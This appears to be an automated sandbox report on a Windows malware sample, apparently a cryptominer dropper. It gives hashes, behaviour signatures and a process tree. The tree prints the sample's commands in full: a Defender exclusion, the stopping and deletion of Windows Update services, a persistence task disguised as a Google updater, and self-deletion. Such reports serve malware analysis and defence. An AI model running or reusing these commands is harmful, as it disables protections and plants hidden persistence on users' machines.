Analysis

  • max time kernel
    31s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
  • submitted
    01-07-2023 07:12

General

  • Target

    LIMMinexe.exe

  • Size

    3.6MB

  • MD5

    d0525e69e54066d5b3764acefd16a754

  • SHA1

    513304e7eca83acedad4655a135a6f4c2c1f4aed

  • SHA256

    d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce

  • SHA512

    b958797b913b1860daa2cdf4f6741835042e170fea4c4b5f3ae61432a9e24054dbcd40dbc4871d19b12d3f40d90523490caa37e6152d66850c05f18b7d738f03

  • SSDEEP

    98304:vKNU8zvQiW+xPSCcgu3ebV6GDRjar2H2wKr3:avhWXrycG1jamKr3

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1320
      • C:\Users\Admin\AppData\Local\Temp\LIMMinexe.exe
        "C:\Users\Admin\AppData\Local\Temp\LIMMinexe.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Suspicious behavior: EnumeratesProcesses
        PID:112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1600
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1880
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1420
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1344
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1044
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:1936
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:700
        • C:\Windows\System32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:480
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:1968
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:1012
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:240
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:528
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:280
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-ac 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1928
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-dc 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1516
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-ac 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1316
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1548
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
                2⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:952
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'
                  3⤵
                  • Creates scheduled task(s)
                  PID:688
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\LIMMinexe.exe"
                2⤵
                • Deletes itself
                • Suspicious use of WriteProcessMemory
                PID:428
                • C:\Windows\System32\choice.exe
                  choice /C Y /N /D Y /T 3
                  3⤵
                    PID:292

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4VSDDC93382EJQ94AYA8.temp

                Filesize

                7KB

                MD5

                24780bd2c4c2ee0ed68ecd309abbf7d1

                SHA1

                487431fb449b698a5932bd862fc19f04c927a59a

                SHA256

                36648787e282bb1f247f199bad92749566250bb5a1944e6a0af58da6f0da1247

                SHA512

                9818fa88bb2f4f530fa2799a9ce5eb1406283bbe10b06ff53bf293d980106e7ffd0815ee7b0ea2b96dee00fd278449b641f3a7ddbacbd913cff0835da85eb65d

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                Filesize

                7KB

                MD5

                24780bd2c4c2ee0ed68ecd309abbf7d1

                SHA1

                487431fb449b698a5932bd862fc19f04c927a59a

                SHA256

                36648787e282bb1f247f199bad92749566250bb5a1944e6a0af58da6f0da1247

                SHA512

                9818fa88bb2f4f530fa2799a9ce5eb1406283bbe10b06ff53bf293d980106e7ffd0815ee7b0ea2b96dee00fd278449b641f3a7ddbacbd913cff0835da85eb65d

              • memory/112-77-0x000000013F750000-0x000000013FAEA000-memory.dmp

                Filesize

                3.6MB

              • memory/952-71-0x0000000001E80000-0x0000000001E88000-memory.dmp

                Filesize

                32KB

              • memory/952-70-0x000000001B170000-0x000000001B452000-memory.dmp

                Filesize

                2.9MB

              • memory/952-72-0x0000000002490000-0x0000000002510000-memory.dmp

                Filesize

                512KB

              • memory/952-73-0x0000000002490000-0x0000000002510000-memory.dmp

                Filesize

                512KB

              • memory/952-74-0x0000000002490000-0x0000000002510000-memory.dmp

                Filesize

                512KB

              • memory/952-75-0x000000000249B000-0x00000000024D2000-memory.dmp

                Filesize

                220KB

              • memory/1600-61-0x0000000002490000-0x0000000002510000-memory.dmp

                Filesize

                512KB

              • memory/1600-63-0x000000000249B000-0x00000000024D2000-memory.dmp

                Filesize

                220KB

              • memory/1600-62-0x0000000002490000-0x0000000002510000-memory.dmp

                Filesize

                512KB

              • memory/1600-60-0x0000000002490000-0x0000000002510000-memory.dmp

                Filesize

                512KB

              • memory/1600-58-0x000000001B0D0000-0x000000001B3B2000-memory.dmp

                Filesize

                2.9MB

              • memory/1600-59-0x0000000001F80000-0x0000000001F88000-memory.dmp

                Filesize

                32KB